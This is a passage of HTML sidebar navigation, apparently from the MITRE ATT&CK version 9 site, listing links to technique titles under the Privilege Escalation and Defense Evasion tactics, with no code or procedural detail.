id="enterprise-TA0004-T1548-body" aria-labelledby="enterprise-TA0004-T1548-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1548-T1548.001"> <a href="/versions/v9/techniques/T1548/001/"> Setuid and Setgid </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1548-T1548.002"> <a 
href="/versions/v9/techniques/T1548/002/"> Bypass User Account Control </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1548-T1548.003"> <a href="/versions/v9/techniques/T1548/003/"> Sudo and Sudo Caching </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1548-T1548.004"> <a href="/versions/v9/techniques/T1548/004/"> Elevated Execution with Prompt </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1134"> <a href="/versions/v9/techniques/T1134/"> Access Token Manipulation </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1134-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1134-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1134-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1134-body" aria-labelledby="enterprise-TA0004-T1134-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1134-T1134.001"> <a href="/versions/v9/techniques/T1134/001/"> Token Impersonation/Theft </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1134-T1134.002"> <a href="/versions/v9/techniques/T1134/002/"> Create Process with Token </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1134-T1134.003"> <a href="/versions/v9/techniques/T1134/003/"> Make and Impersonate Token </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1134-T1134.004"> <a href="/versions/v9/techniques/T1134/004/"> Parent PID Spoofing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1134-T1134.005"> <a href="/versions/v9/techniques/T1134/005/"> SID-History Injection </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1547"> <a href="/versions/v9/techniques/T1547/"> Boot or Logon 
Autostart Execution </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1547-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1547-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1547-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1547-body" aria-labelledby="enterprise-TA0004-T1547-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.001"> <a href="/versions/v9/techniques/T1547/001/"> Registry Run Keys / Startup Folder </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.002"> <a href="/versions/v9/techniques/T1547/002/"> Authentication Package </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.003"> <a href="/versions/v9/techniques/T1547/003/"> Time Providers </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.004"> <a href="/versions/v9/techniques/T1547/004/"> Winlogon Helper DLL </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.005"> <a href="/versions/v9/techniques/T1547/005/"> Security Support Provider </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.006"> <a href="/versions/v9/techniques/T1547/006/"> Kernel Modules and Extensions </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.007"> <a href="/versions/v9/techniques/T1547/007/"> Re-opened Applications </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.008"> <a href="/versions/v9/techniques/T1547/008/"> LSASS Driver </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.009"> <a href="/versions/v9/techniques/T1547/009/"> Shortcut Modification </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" 
id="enterprise-TA0004-T1547-T1547.010"> <a href="/versions/v9/techniques/T1547/010/"> Port Monitors </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.011"> <a href="/versions/v9/techniques/T1547/011/"> Plist Modification </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.012"> <a href="/versions/v9/techniques/T1547/012/"> Print Processors </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.013"> <a href="/versions/v9/techniques/T1547/013/"> XDG Autostart Entries </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1547-T1547.014"> <a href="/versions/v9/techniques/T1547/014/"> Active Setup </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1037"> <a href="/versions/v9/techniques/T1037/"> Boot or Logon Initialization Scripts </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1037-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1037-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1037-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1037-body" aria-labelledby="enterprise-TA0004-T1037-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1037-T1037.001"> <a href="/versions/v9/techniques/T1037/001/"> Logon Script (Windows) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1037-T1037.002"> <a href="/versions/v9/techniques/T1037/002/"> Logon Script (Mac) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1037-T1037.003"> <a href="/versions/v9/techniques/T1037/003/"> Network Logon Script </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1037-T1037.004"> <a href="/versions/v9/techniques/T1037/004/"> RC Scripts </a> </div> 
</div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1037-T1037.005"> <a href="/versions/v9/techniques/T1037/005/"> Startup Items </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1543"> <a href="/versions/v9/techniques/T1543/"> Create or Modify System Process </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1543-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1543-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1543-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1543-body" aria-labelledby="enterprise-TA0004-T1543-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1543-T1543.001"> <a href="/versions/v9/techniques/T1543/001/"> Launch Agent </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1543-T1543.002"> <a href="/versions/v9/techniques/T1543/002/"> Systemd Service </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1543-T1543.003"> <a href="/versions/v9/techniques/T1543/003/"> Windows Service </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1543-T1543.004"> <a href="/versions/v9/techniques/T1543/004/"> Launch Daemon </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1484"> <a href="/versions/v9/techniques/T1484/"> Domain Policy Modification </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1484-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1484-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1484-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1484-body" aria-labelledby="enterprise-TA0004-T1484-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1484-T1484.001"> <a href="/versions/v9/techniques/T1484/001/"> 
Group Policy Modification </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1484-T1484.002"> <a href="/versions/v9/techniques/T1484/002/"> Domain Trust Modification </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1611"> <a href="/versions/v9/techniques/T1611/"> Escape to Host </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1546"> <a href="/versions/v9/techniques/T1546/"> Event Triggered Execution </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1546-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1546-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1546-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1546-body" aria-labelledby="enterprise-TA0004-T1546-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.001"> <a href="/versions/v9/techniques/T1546/001/"> Change Default File Association </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.002"> <a href="/versions/v9/techniques/T1546/002/"> Screensaver </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.003"> <a href="/versions/v9/techniques/T1546/003/"> Windows Management Instrumentation Event Subscription </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.004"> <a href="/versions/v9/techniques/T1546/004/"> Unix Shell Configuration Modification </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.005"> <a href="/versions/v9/techniques/T1546/005/"> Trap </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.006"> <a href="/versions/v9/techniques/T1546/006/"> LC_LOAD_DYLIB Addition </a> </div> </div> <div class="sidenav"> <div 
class="sidenav-head" id="enterprise-TA0004-T1546-T1546.007"> <a href="/versions/v9/techniques/T1546/007/"> Netsh Helper DLL </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.008"> <a href="/versions/v9/techniques/T1546/008/"> Accessibility Features </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.009"> <a href="/versions/v9/techniques/T1546/009/"> AppCert DLLs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.010"> <a href="/versions/v9/techniques/T1546/010/"> AppInit DLLs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.011"> <a href="/versions/v9/techniques/T1546/011/"> Application Shimming </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.012"> <a href="/versions/v9/techniques/T1546/012/"> Image File Execution Options Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.013"> <a href="/versions/v9/techniques/T1546/013/"> PowerShell Profile </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.014"> <a href="/versions/v9/techniques/T1546/014/"> Emond </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1546-T1546.015"> <a href="/versions/v9/techniques/T1546/015/"> Component Object Model Hijacking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1068"> <a href="/versions/v9/techniques/T1068/"> Exploitation for Privilege Escalation </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1574"> <a href="/versions/v9/techniques/T1574/"> Hijack Execution Flow </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1574-header" data-toggle="collapse" 
data-target="#enterprise-TA0004-T1574-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1574-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1574-body" aria-labelledby="enterprise-TA0004-T1574-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.001"> <a href="/versions/v9/techniques/T1574/001/"> DLL Search Order Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.002"> <a href="/versions/v9/techniques/T1574/002/"> DLL Side-Loading </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.004"> <a href="/versions/v9/techniques/T1574/004/"> Dylib Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.005"> <a href="/versions/v9/techniques/T1574/005/"> Executable Installer File Permissions Weakness </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.006"> <a href="/versions/v9/techniques/T1574/006/"> Dynamic Linker Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.007"> <a href="/versions/v9/techniques/T1574/007/"> Path Interception by PATH Environment Variable </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.008"> <a href="/versions/v9/techniques/T1574/008/"> Path Interception by Search Order Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.009"> <a href="/versions/v9/techniques/T1574/009/"> Path Interception by Unquoted Path </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.010"> <a href="/versions/v9/techniques/T1574/010/"> Services File Permissions Weakness </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" 
id="enterprise-TA0004-T1574-T1574.011"> <a href="/versions/v9/techniques/T1574/011/"> Services Registry Permissions Weakness </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1574-T1574.012"> <a href="/versions/v9/techniques/T1574/012/"> COR_PROFILER </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1055"> <a href="/versions/v9/techniques/T1055/"> Process Injection </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1055-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1055-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1055-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1055-body" aria-labelledby="enterprise-TA0004-T1055-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.001"> <a href="/versions/v9/techniques/T1055/001/"> Dynamic-link Library Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.002"> <a href="/versions/v9/techniques/T1055/002/"> Portable Executable Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.003"> <a href="/versions/v9/techniques/T1055/003/"> Thread Execution Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.004"> <a href="/versions/v9/techniques/T1055/004/"> Asynchronous Procedure Call </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.005"> <a href="/versions/v9/techniques/T1055/005/"> Thread Local Storage </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.008"> <a href="/versions/v9/techniques/T1055/008/"> Ptrace System Calls </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.009"> <a 
href="/versions/v9/techniques/T1055/009/"> Proc Memory </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.011"> <a href="/versions/v9/techniques/T1055/011/"> Extra Window Memory Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.012"> <a href="/versions/v9/techniques/T1055/012/"> Process Hollowing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.013"> <a href="/versions/v9/techniques/T1055/013/"> Process Doppelgänging </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1055-T1055.014"> <a href="/versions/v9/techniques/T1055/014/"> VDSO Hijacking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1053"> <a href="/versions/v9/techniques/T1053/"> Scheduled Task/Job </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1053-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1053-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1053-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1053-body" aria-labelledby="enterprise-TA0004-T1053-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1053-T1053.001"> <a href="/versions/v9/techniques/T1053/001/"> At (Linux) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1053-T1053.002"> <a href="/versions/v9/techniques/T1053/002/"> At (Windows) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1053-T1053.003"> <a href="/versions/v9/techniques/T1053/003/"> Cron </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1053-T1053.004"> <a href="/versions/v9/techniques/T1053/004/"> Launchd </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" 
id="enterprise-TA0004-T1053-T1053.005"> <a href="/versions/v9/techniques/T1053/005/"> Scheduled Task </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1053-T1053.006"> <a href="/versions/v9/techniques/T1053/006/"> Systemd Timers </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1053-T1053.007"> <a href="/versions/v9/techniques/T1053/007/"> Container Orchestration Job </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1078"> <a href="/versions/v9/techniques/T1078/"> Valid Accounts </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1078-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1078-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1078-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1078-body" aria-labelledby="enterprise-TA0004-T1078-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1078-T1078.001"> <a href="/versions/v9/techniques/T1078/001/"> Default Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1078-T1078.002"> <a href="/versions/v9/techniques/T1078/002/"> Domain Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1078-T1078.003"> <a href="/versions/v9/techniques/T1078/003/"> Local Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1078-T1078.004"> <a href="/versions/v9/techniques/T1078/004/"> Cloud Accounts </a> </div> </div> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005"> <a href="/versions/v9/tactics/TA0005"> Defense Evasion </a> <div class="expand-button collapsed" id="enterprise-TA0005-header" data-toggle="collapse" data-target="#enterprise-TA0005-body" aria-expanded="false" aria-controls="#enterprise-TA0005-body"></div> 
</div> <div class="sidenav-body collapse" id="enterprise-TA0005-body" aria-labelledby="enterprise-TA0005-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1548"> <a href="/versions/v9/techniques/T1548/"> Abuse Elevation Control Mechanism </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1548-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1548-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1548-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1548-body" aria-labelledby="enterprise-TA0005-T1548-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1548-T1548.001"> <a href="/versions/v9/techniques/T1548/001/"> Setuid and Setgid </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1548-T1548.002"> <a href="/versions/v9/techniques/T1548/002/"> Bypass User Account Control </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1548-T1548.003"> <a href="/versions/v9/techniques/T1548/003/"> Sudo and Sudo Caching </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1548-T1548.004"> <a href="/versions/v9/techniques/T1548/004/"> Elevated Execution with Prompt </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1134"> <a href="/versions/v9/techniques/T1134/"> Access Token Manipulation </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1134-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1134-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1134-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1134-body" aria-labelledby="enterprise-TA0005-T1134-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1134-T1134.001"> <a href="/versions/v9/techniques/T1134/001/"> Token Impersonation/Theft </a> 
</div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1134-T1134.002"> <a href="/versions/v9/techniques/T1134/002/"> Create Process with Token </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1134-T1134.003"> <a href="/versions/v9/techniques/T1134/003/"> Make and Impersonate Token </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1134-T1134.004"> <a href="/versions/v9/techniques/T1134/004/"> Parent PID Spoofing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1134-T1134.005"> <a href="/versions/v9/techniques/T1134/005/"> SID-History Injection </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1197"> <a href="/versions/v9/techniques/T1197/"> BITS Jobs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1612"> <a href="/versions/v9/techniques/T1612/"> Build Image on Host </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1140"> <a href="/versions/v9/techniques/T1140/"> Deobfuscate/Decode Files or Information </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1610"> <a href="/versions/v9/techniques/T1610/"> Deploy Container </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1006"> <a href="/versions/v9/techniques/T1006/"> Direct Volume Access </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1484"> <a href="/versions/v9/techniques/T1484/"> Domain Policy Modification </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1484-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1484-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1484-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1484-body" 
aria-labelledby="enterprise-TA0005-T1484-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1484-T1484.001"> <a href="/versions/v9/techniques/T1484/001/"> Group Policy Modification </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1484-T1484.002"> <a href="/versions/v9/techniques/T1484/002/"> Domain Trust Modification </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1480"> <a href="/versions/v9/techniques/T1480/"> Execution Guardrails </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1480-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1480-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1480-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1480-body" aria-labelledby="enterprise-TA0005-T1480-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1480-T1480.001"> <a href="/versions/v9/techniques/T1480/001/"> Environmental Keying </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1211"> <a href="/versions/v9/techniques/T1211/"> Exploitation for Defense Evasion </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1222"> <a href="/versions/v9/techniques/T1222/"> File and Directory Permissions Modification </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1222-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1222-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1222-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1222-body" aria-labelledby="enterprise-TA0005-T1222-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1222-T1222.001"> <a href="/versions/v9/techniques/T1222/001/"> Windows File and Directory Permissions Modification </a> </div> </div> <div 
class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1222-T1222.002"> <a href="/versions/v9/techniques/T1222/002/"> Linux and Mac File and Directory Permissions Modification </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1564"> <a href="/versions/v9/techniques/T1564/"> Hide Artifacts </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1564-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1564-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1564-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1564-body" aria-labelledby="enterprise-TA0005-T1564-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1564-T1564.001"> <a href="/versions/v9/techniques/T1564/001/"> Hidden Files and Directories </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1564-T1564.002"> <a href="/versions/v9/techniques/T1564/002/"> Hidden Users </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1564-T1564.003"> <a href="/versions/v9/techniques/T1564/003/"> Hidden Window </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1564-T1564.004"> <a href="/versions/v9/techniques/T1564/004/"> NTFS File Attributes </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1564-T1564.005"> <a href="/versions/v9/techniques/T1564/005/"> Hidden File System </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1564-T1564.006"> <a href="/versions/v9/techniques/T1564/006/"> Run Virtual Instance </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1564-T1564.007"> <a href="/versions/v9/techniques/T1564/007/"> VBA Stomping </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1574"> <a 
href="/versions/v9/techniques/T1574/"> Hijack Execution Flow </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1574-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1574-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1574-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1574-body" aria-labelledby="enterprise-TA0005-T1574-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.001"> <a href="/versions/v9/techniques/T1574/001/"> DLL Search Order Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.002"> <a href="/versions/v9/techniques/T1574/002/"> DLL Side-Loading </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.004"> <a href="/versions/v9/techniques/T1574/004/"> Dylib Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.005"> <a href="/versions/v9/techniques/T1574/005/"> Executable Installer File Permissions Weakness </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.006"> <a href="/versions/v9/techniques/T1574/006/"> Dynamic Linker Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.007"> <a href="/versions/v9/techniques/T1574/007/"> Path Interception by PATH Environment Variable </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.008"> <a href="/versions/v9/techniques/T1574/008/"> Path Interception by Search Order Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.009"> <a href="/versions/v9/techniques/T1574/009/"> Path Interception by Unquoted Path </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.010"> <a 
href="/versions/v9/techniques/T1574/010/"> Services File Permissions Weakness </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.011"> <a href="/versions/v9/techniques/T1574/011/"> Services Registry Permissions Weakness </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1574-T1574.012"> <a href="/versions/v9/techniques/T1574/012/"> COR_PROFILER </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1562"> <a href="/versions/v9/techniques/T1562/"> Impair Defenses </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1562-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1562-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1562-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1562-body" aria-labelledby="enterprise-TA0005-T1562-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1562-T1562.001"> <a href="/versions/v9/techniques/T1562/001/"> Disable or Modify Tools </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1562-T1562.002"> <a href="/versions/v9/techniques/T1562/002/"> Disable Windows 